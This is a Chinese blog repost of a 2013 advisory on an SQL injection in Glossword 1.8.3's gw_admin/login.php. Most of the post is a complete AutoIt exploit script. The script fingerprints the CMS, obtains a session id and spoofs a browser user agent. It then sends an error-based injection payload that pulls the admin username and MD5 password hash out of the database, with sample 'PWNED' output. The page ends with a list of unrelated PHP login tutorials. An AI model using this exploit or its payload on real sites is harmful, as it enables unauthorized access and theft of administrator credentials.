login.php入侵,Glossword 'login.php' SQL 注入漏洞

最新推荐文章于 2023-07-05 21:09:23 发布
最新推荐文章于 2023-07-05 21:09:23 发布
阅读量513 收藏
点赞数
文章标签: login.php入侵

发布日期:2013-02-05

更新日期:2013-02-27

受影响系统:

sourceforge glossword 1.8.3

描述:

--------------------------------------------------------------------------------

BUGTRAQ  ID: 57732

Glossword是创建和发布在线多语言字典、词汇或百科全书的系统。

Glossword 1.8.3及其他版本的gw_admin/login.php脚本没有正确过滤'arPost[user_name]'参数值,允许攻击者在后端数据库内注入或操作SQL查询。

链接:http://osvdb.org/89882

http://xforce.iss.net/xforce/xfdb/81837

http://packetstormsecurity.com/files/120044/glossword1.8.3_sqli_exploit.txt

*>

测试方法:

--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#cs

==============================================================

Vulnerable Software: Glossword 1.8.3

Official site: http://sourceforge.net/projects/glossword/

Download: http://sourceforge.net/projects/glossword/files/glossword/1.8.3/

Vuln: SQLi

==================THIS IS A WHOLE EXPLOIT=====================

Exploit Coded In AutoIT.

To exploit this vulnerability magic_quotes_gpc must be turned off on server side.

Print screen: http://s004.radikal.ru/i206/1302/89/d7398ade1cd7.png

POC video: http://youtu.be/55IaNTQS3Fk

Exploit usage:

C:\0day>glossa.exe http://hacker1.own /glossword/glossword/ 2

##############################################################

#          Glossword 1.8.3 SQL injection Exploit            #

# Usage: glossa.exe http://site.tld  /installdir/  UID (int) #

#        DON'T HATE THE HACKER, HATE YOUR OWN CODE!          #

#            VULN/Exploit: AkaStep & HERO_AZE                #

##############################################################

##############################################################

[*] SENDING FAKE SESSUID: ea0f5d8c7c2c8a2f9f7c3b3e5a3d4f5d [*]

##############################################################

##############################################################

[*]                  CMS is GLOSSWORD!                    [*]

##############################################################

##############################################################

[*]                FETCHING VALID SESSUID                  [*]

##############################################################

##############################################################

[*]  Got VALID SESSUID: aa0e680bef2679932393abe72b78ef03  [*]

##############################################################

##############################################################

[*]                  !~ P*W*N*E*D ~!                      [*]

--------------------------------------------------------------

[*] Login: admin                                          [*]

--------------------------------------------------------------

[*] Password: (MD5) 260efaff0cac0f78a53ccc540e89e72d      [*]

--------------------------------------------------------------

Admin Panel: hacker1.own/glossword/glossword/gw_admin/login.php

--------------------------------------------------------------

[*]                    Good Luck;)                        [*]

##############################################################

[*]                    DONE                              [*]

##############################################################

#ce

#NoTrayIcon

#Region ;**** Directives created by AutoIt3Wrapper_GUI ****

#AutoIt3Wrapper_Outfile=glossa.exe

#AutoIt3Wrapper_UseUpx=n

#AutoIt3Wrapper_Change2CUI=y

#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****

#include "WinHttp.au3"

#include

#include

$triptrop=@CRLF & _StringRepeat('#',62) & @CRLF;

$exploitname=@CRLF & _StringRepeat('#',62) & @CRLF & _

'#' & _StringRepeat(' ',11) & 'Glossword 1.8.3 SQL injection Exploit ' & _StringRepeat(' ',11) & '#' & @CRLF  & _

'# Usage: ' & @ScriptName &  ' http://site.tld ' & ' /installdir/ ' & ' UID (int) #' & _

@CRLF & "#        DON'T HATE THE HACKER, HATE YOUR OWN CODE!          #" & @CRLF & _

'#            VULN/Exploit: AkaStep & HERO_AZE                #' & @CRLF & _StringRepeat('#',62);

ConsoleWrite(@CRLF & $exploitname & @CRLF)

$method='POST';

$vulnurl='gw_admin/login.php'

Global $sessid=0

$cmsindent='lossword'; # We will use it to identify CMS #;

$adminpanel=$vulnurl

;#~  Impersonate that We Are Not BOT or exploit.We are human who uses IE.# ~;

$useragent='Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SV1; .NET CLR 1.1.4325)';

$msg_usage="Command Line Plizzzz => " & @CRLF & "Usage: " & @ScriptName &  ' http://site.tld ' & ' /installdir/ ' &  ' UID (int)' & @CRLF

if  $CmdLine[0] <> 3 Then

ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF);

MsgBox(64,"",$msg_usage);

exit;

EndIf

if $CmdLine[0]=3 Then

$targetsite=$CmdLine[1];

$installdir=$CmdLine[2];

$uidtoattack=Number(StringMid($CmdLine[3],1,255));

EndIf

if not StringIsDigit($uidtoattack) Then

ConsoleWrite(' UID is wrong! Exit' );

Exit;

EndIf

if StringStripWS($targetsite,8)='' OR StringStripWS($installdir,8)='' Then

ConsoleWrite('Are you kidding meeeeen?');

Exit;

EndIf

HttpSetUserAgent($useragent)

$doublecheck=InetGet($targetsite,'',1);

if @error Then

ConsoleWrite('[*] Incorrect Domain Name/Or you are Offline! [*]' & @CRLF)

Exit;

EndIf

sleep(Random(1200,2500,1));

sendfakeretrivevalidsess($targetsite,$installdir)

HttpSetUserAgent($useragent);

$sidentify=_INetGetSource($targetsite & $adminpanel,True);

Func exploit($targetsite,$installdir,$sessid)

Global $sAddress = $targetsite

Global $PAYLOADTOSEND ="arPost[user_name]=') AND (select floor(rand(0)*2) from(select count(*)," & _

"concat((select concat(0x3C73696B6469723E,login,0x7c,password,0x3C2F73696B6469723E,0x7c) from " & _

"gw_auth where id_auth=" & $uidtoattack & "),floor(rand(0)*2))x from information_schema.tables group by x)a)-- " & _

" AND 1=('1&arPost[user_email]=trueownage&a=lostpass&sid=" & $sessid & "&post=Send password";

Global $sDomain = $targetsite

Global $sPage = $installdir & $vulnurl

Global $sAdditionalData = $PAYLOADTOSEND

Global $hOpen = _WinHttpOpen($useragent)

Global $hConnect = _WinHttpConnect($hOpen, $sDomain)

Global $hRequest = _WinHttpOpenRequest($hConnect, "POST", $sPage, -1, -1, -1, '')

_WinHttpSendRequest($hRequest, "Content-Type: application/x-www-form-urlencoded", $sAdditionalData)

_WinHttpReceiveResponse($hRequest)

Global $sReturned

If _WinHttpQueryDataAvailable($hRequest) Then

Do

$sReturned &= _WinHttpReadData($hRequest)

Until @error

if StringInStr($sReturned,'') and StringInStr($sReturned,'') Then

$zsuxxv = StringRegExp($sReturned, '(.*?)(?i)sikdir>', 1)

For $x = 0 To UBound($zsuxxv) - 1

Beep(100,1000);

ConsoleWrite($triptrop & '[*]                  !~ P*W*N*E*D ~!                      [*] ' & _

StringReplace($triptrop,'#','-') & '[*] Login: ' & StringMid($zsuxxv[$x],1,StringInStr($zsuxxv[$x],'|')-1) & _

_StringRepeat(' ',StringLen($triptrop)-18-StringLen(StringMid($zsuxxv[$x],1,StringInStr($zsuxxv[$x],'|')-1))) & '[*]' & _

StringReplace($triptrop,'#','-') & '[*] Password: (MD5) ' & StringReplace($zsuxxv[$x],StringMid($zsuxxv[$x],1,StringInStr($zsuxxv[$x],'|')),'') & _

'      [*] ' & _

StringReplace($triptrop,'#','-') & _

'Admin Panel: ' & $targetsite & $installdir &$adminpanel & ' ' & StringReplace($triptrop,'#','-') & _

'[*]                    Good Luck;)                        [*]' & _

$triptrop & '[*]                    DONE                              [*]' & _

$triptrop);

Next

Else

ConsoleWrite($triptrop & '[*] ' & _StringRepeat(' ',18) & '  NO SUCH UID!  ' &  _StringRepeat(' ',18) & _

' [*]' & $triptrop);

Beep(1500,1000);

Exit

EndIf

EndIf

_WinHttpCloseHandle($hRequest)

_WinHttpCloseHandle($hConnect)

_WinHttpCloseHandle($hOpen)

EndFunc;=> exploit();

Func  sendfakeretrivevalidsess($targetsite,$installdir)

$fakesessionID='';

Do

$fakesessionID&=Chr(Random(97,102,1)) & Random(0,9,1)

until StringLen($fakesessionID)=32

$fakesessionID=StringMid($fakesessionID,Random(1,32,1),1) & StringMid($fakesessionID,1,StringLen($fakesessionID)-1)

ConsoleWrite($triptrop & '[*] SENDING FAKE SESSUID: ' & $fakesessionID &  ' [*] ' &  $triptrop)

sleep(Random(1000,2500,1))

$rtarget=$targetsite & $installdir &"gw_admin/login.php?visualtheme=gw_admin&sid=" &$fakesessionID;

HttpSetUserAgent($useragent);

$str=_INetGetSource($rtarget);

if StringInStr($str,"Session does not exist.") then

ConsoleWrite($triptrop & '[*]' &  _StringRepeat(' ',18) & 'CMS is GLOSSWORD!  ' &  _StringRepeat(' ',19) & '[*]' & $triptrop);

sleep(Random(1000,2500,1))

Else

ConsoleWrite($triptrop & '[*]' & _StringRepeat(' ',11) &'NOPE:( THIS IS NOT GLOSSWORD CMS.' &_StringRepeat(' ',12) &'[*]' & $triptrop);

exit;

EndIf

$i=123

$mystr='';

ConsoleWrite($triptrop & '[*]' & _StringRepeat(' ',16) & 'FETCHING VALID SESSUID' & _StringRepeat(' ',17) & ' [*]' & $triptrop)

sleep(Random(1000,2500,1))

Do

$i+=1;

if $i>=4000 then ExitLoop;//Just for make sure we are not going to infinitive loop if there any error occurs.//

$mystr&=StringMid($str,$i,1)

until StringInStr($mystr,chr(34));

$sessid=StringMid($mystr,StringInStr($mystr,Chr(61))+1,32)

if not $sessid =32 Then

ConsoleWrite($triptrop & '[*] Sorry Man! Theris an error while fetching new VALID SESSUID  [*]' & $triptrop)

exit;

Else

ConsoleWrite($triptrop & '[*]  Got VALID SESSUID: ' & $sessid &  '  [*]' & $triptrop)

EndIf

$targetsite=StringReplace(StringReplace($targetsite,'http://',''),'/','')

exploit($targetsite,$installdir,$sessid)

EndFunc;=>sendfakeretrivevalidsess();

#cs

================================================

KUDOSSSSSSS

================================================

packetstormsecurity.org

packetstormsecurity.com

packetstormsecurity.net

securityfocus.com

cxsecurity.com

security.nnov.ru

securtiyvulns.com

securitylab.ru

secunia.com

securityhome.eu

exploitsdownload.com

osvdb.com

websecurity.com.ua

1337day.com

itsecuritysolutions.org

to all Aa Team + to all Azerbaijan Black HatZ

+ *Especially to my bro CAMOUFL4G3 *

To All Turkish Hackers

Also special thanks to: ottoman38 & HERO_AZE

================================================

/AkaStep

#ce

建议:

--------------------------------------------------------------------------------

厂商补丁:

sourceforge

-----------

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://sourceforge.net/projects/glossword/0b1331709591d260c1c78e86d0c51c18.png

KUBE蕉
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP选课系统第三集——登录页面(login.php
weixin_51382471的博客
04-29 1925
PHP选课系统第三集——登录页面(login.php) 这是PHP选课系统系列的第三篇,此系列会带领新学习PHP的萌新们一点一点的自己完成一个选课系统。我也是新学的菜鸟,所以大家一起努力吧! 如果不想看过程,最后有最终代码。 **在这里用的环境是NetBeans IDE 8.0.2和XAMPP。**
http:///login.php,php如何用curl模拟登录http://www.lazpw.cn/user/login.php
weixin_42517649的博客
03-13 1020
largeQ拿去用,不谢if (! is_writable(__DIR__)) { exit('目录不可写,exit');}$cookie_file = 'cookies.txt';$username = 'ty0716';$password = 'test12345';$post = array( 'username' => $username, 'password' =...
怎么编写login.php,【php增删改查实例】第十八节 - login.php编写
weixin_29170089的博客
03-10 786
1.对用户名和密码进行非空判断(后台验证)$username;$password;if(isset($_POST['username']) && $_POST['username'] != null){$username = $_POST['username'];}else{echo "用户名不能为空!";return;}if(isset($_POST['password']) &...
php如何实现sql注入
weixin_42577243的博客
01-18 395
SQL注入是通过构造恶意的SQL语句,利用程序中的漏洞,直接在数据库中执行。在 PHP 中,可以使用 PDO 或 mysqli 来预处理 SQL 语句来防止 SQL 注入。这样可以避免在查询中直接插入用户输入的数据。 如果使用 PDO ,可以使用 prepare() 和 execute() 方法来预处理 SQL 语句,并将参数绑定到语句中。 如果使用 mysqli ,可以使用 prepare() ...
WordPress<= 4.6命令执行漏洞vulhub复现
weixin_45895237的博客
03-18 6285
WordPress <= 4.6(PHPMailer)命令执行漏洞(CVE-2016-10033)
Oracle SqlPlus设置Login.sql的技巧
09-10
在使用SQLPlus时,有一些配置技巧可以提升工作效率,尤其是通过设置Login.sql文件。Login.sqlSQLPlus启动时自动运行的一个脚本,用于设置默认的环境变量和选项。 在启动SQLPlus时,系统会按照以下顺序执行两个...
Axublog 1.1.0 c_login.php存在sql注入漏洞1
08-03
继续跟踪登录验证函数,jsloginpost 方法定义在文件 www/ad/c_login.php 第74行。这里可以看到 user 和 psw 没有任何过滤直
php-login-user-manage.zip_/manage/login.php_Free!_acconte_php lo
09-21
【标题】"php-login-user-manage.zip_/manage/login.php_Free!_acconte_php lo" 提供的信息表明,这是一个关于PHP用户管理系统登录部分的源代码压缩包。它可能包含了一个用于处理用户登录功能的PHP脚本,名为`login....
U8Login.dll
11-20
除了"U8Login.dll",压缩包中还包括了"UFSoft.U8.Framework.Login.UI.dll"文件,这是用友U8登录界面相关的UI框架库,包含了登录界面的控件和样式定义,使得开发者在自定义登录界面时能够保持与原系统风格的一致性。...
fannuo4.1.rar_cms_login.asp
09-22
【标题】"fannuo4.1.rar_cms_login.asp" 涉及的主要知识点是企业网站建设和ASP编程,特别是CMS(内容管理系统)的登录页面实现。在这个标题中,"fannuo4.1.rar"可能是一个软件版本号或者项目名称,而"cms_login.asp...
php怎么注入,php注入方法集锦
weixin_36119965的博客
03-11 514
'%23'andpassWord='mypassid=-1unionselect1,1,1id=-1unionselectchar(97),char(97),char(97)id=1unionselect1,1,1frommembersid=1unionselect1,1,1fromadminid=1unionselect1,1,1fromuserus...
怎么编写login.php,PHP登录功能如何编写
weixin_39837867的博客
03-10 1821
本篇文章主要介绍PHP登录功能如何编写,感兴趣的朋友参考下,希望对大家有所帮助。具体代码如下:1 login.php登录界面中,javascript脚本用ajax方式异步请求dologin.php,dologin.php负责用户信息验证(包括验证码,php生成验证码可以自行搜索).登录界面的代码如下:loginfunction chkForm() {if (m$('username').value...
login.php空白,dede后台空白,PHP文件不能运行,登录空白--解决方案
weixin_42104778的博客
03-18 324
dede后台空白,PHP文件不能运行,登录空白--解决方案这个纠结了一上午的事情,就因为用记事本修改了下data/common.inc.php,导致登陆dedecms后台就空白,运行不了php这需要刚刚安装好的全新的dedecms的data/common.inc.php文件,用dw改数据库连接信息DEDE安装后,后台页面空白,后台栏目链接空白,而且还不能注销后台。进入后台,也只能通过/dede/l...
PHP实现用户登录页面
weixin_54963682的博客
03-03 355
PHP实现用户登录页面 我用了bootstrap框架,这样的界面要好看一点 HTML代码: 登录 注册 注销 //模态框 ×Close 请登录
PHP漏洞全解(七)-Session劫持
zacklin的专栏
04-16 1523
服务端和客户端之间是通过session(会话)来连接沟通。当客户端的浏览器连接到服务器后,服务器就会建立一个该用户的session。每个用户的session都是独立的,并且由服务器来维护。每个用户的session是由一个独特的字符串来识别,成为session id。用户发出请求时,所发送的http表头内包含session id 的值。服务器使用http表头内的session id来识别时哪个用户提
ecmslogin.php,代码审计——zcncms几处漏洞合集(二)
weixin_39723899的博客
03-25 546
from:小黑屋继上一篇参数$parentid未正确处理后,在/module/products/admincontroller/products_photo.php中,switch($a){case 'list':default://list//列表if (empty($productid)) {$where = ' 1 = 1 ';} else {$where = " productid = '...
PHP实现用户登录注册(详细教程)
热门推荐
weixin_44651759的博客
05-18 8万+
教程前先给大家看看小编的实现成果吧! 图1: 图2: 图3: 教程: 实现这个功能我们需要五个php文件: login.php (登录界面,如图2) <!DOCTYPE html> <html><head> <title>登录</title> <meta name="content-type"; charset="UTF-8"...
使用PHP创建登录界面
最新发布
qq_72098733的博客
07-05 851
(1)缺乏输入验证:在处理用户提交的表单数据之前,应该对输入数据进行验证。(4)不安全的会话管理:处理用户登录后,应使用安全的会话管理来维护用户的登录状态。这包括为每个用户分配唯一的会话ID,并将敏感信息存储在服务器端,而不是在用户的Cookie中。用户验证:在处理表单数据后,需要对用户名和密码进行验证,确保它们的准确性与安全性。确保在处理用户输入时进行适当的过滤和验证,以防止潜在的安全漏洞(如SQL注入)。会话管理:一旦用户通过验证,可以使用PHP的会话管理机制来维护用户的登录状态。
怎么编写login.php,利用PHP怎么编写一个注册登录系统
weixin_42181686的博客
03-10 1118
利用PHP怎么编写一个注册登录系统发布时间:2020-12-28 16:27:37来源:亿速云阅读:58作者:Leah这篇文章将为大家详细讲解有关利用PHP怎么编写一个注册登录系统,文章内容质量较高,因此小编分享给大家做个参考,希望大家阅读完这篇文章后对相关知识有一定的了解。目录结构如下,其中function文件夹下包含两个函数文件,uploads文件夹用于存放上传的文件。注:博主使用的是php5...
点击按钮跳转页面login.php
05-31
很抱歉,作为一个AI语言模型,我没有权限执行实际的网页操作。但是,您可以在您的网页代码中添加一个按钮并将其链接到“login.php”页面,以实现该功能。例如,您可以添加以下代码来创建一个按钮并将其链接到“login.php”页面: ``` <button onclick="window.location.href='login.php'">登录</button> ``` 当用户单击该按钮时,将自动跳转到“login.php”页面。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值